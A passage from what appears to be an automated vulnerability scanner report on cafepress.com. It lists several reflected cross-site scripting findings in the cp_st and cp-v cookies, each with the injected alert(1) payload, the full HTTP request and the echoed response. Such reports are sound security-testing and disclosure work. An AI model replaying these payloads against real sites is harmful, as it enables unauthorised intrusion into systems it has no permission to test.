2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+ipad-cases

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da017</script><script>alert(1)</script>5b17e49d25b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=da017</script><script>alert(1)</script>5b17e49d25b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 88378
Date: Sun, 26 Dec 2010 13:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'da017</script><script>alert(1)</script>5b17e49d25b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+iphone-cases

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1695"-alert(1)-"e836931d7c9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 65237
Date: Sun, 26 Dec 2010 13:48:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+iphone-cases

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b572</script><script>alert(1)</script>4f6addec85e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4b572</script><script>alert(1)</script>4f6addec85e; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 65254
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '4b572</script><script>alert(1)</script>4f6addec85e'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.42. http://www.cafepress.com/+journals [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+journals

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b67"-alert(1)-"894c7ad5c8f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59370
Date: Sun, 26 Dec 2010 13:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.43. http://www.cafepress.com/+journals [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+journals

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e9e</script><script>alert(1)</script>cefee2eaa5b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b2e9e</script><script>alert(1)</script>cefee2eaa5b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59387
Date: Sun, 26 Dec 2010 13:49:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'b2e9e</script><script>alert(1)</script>cefee2eaa5b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+keepsake_boxes

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18c76"-alert(1)-"2689714fbb2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 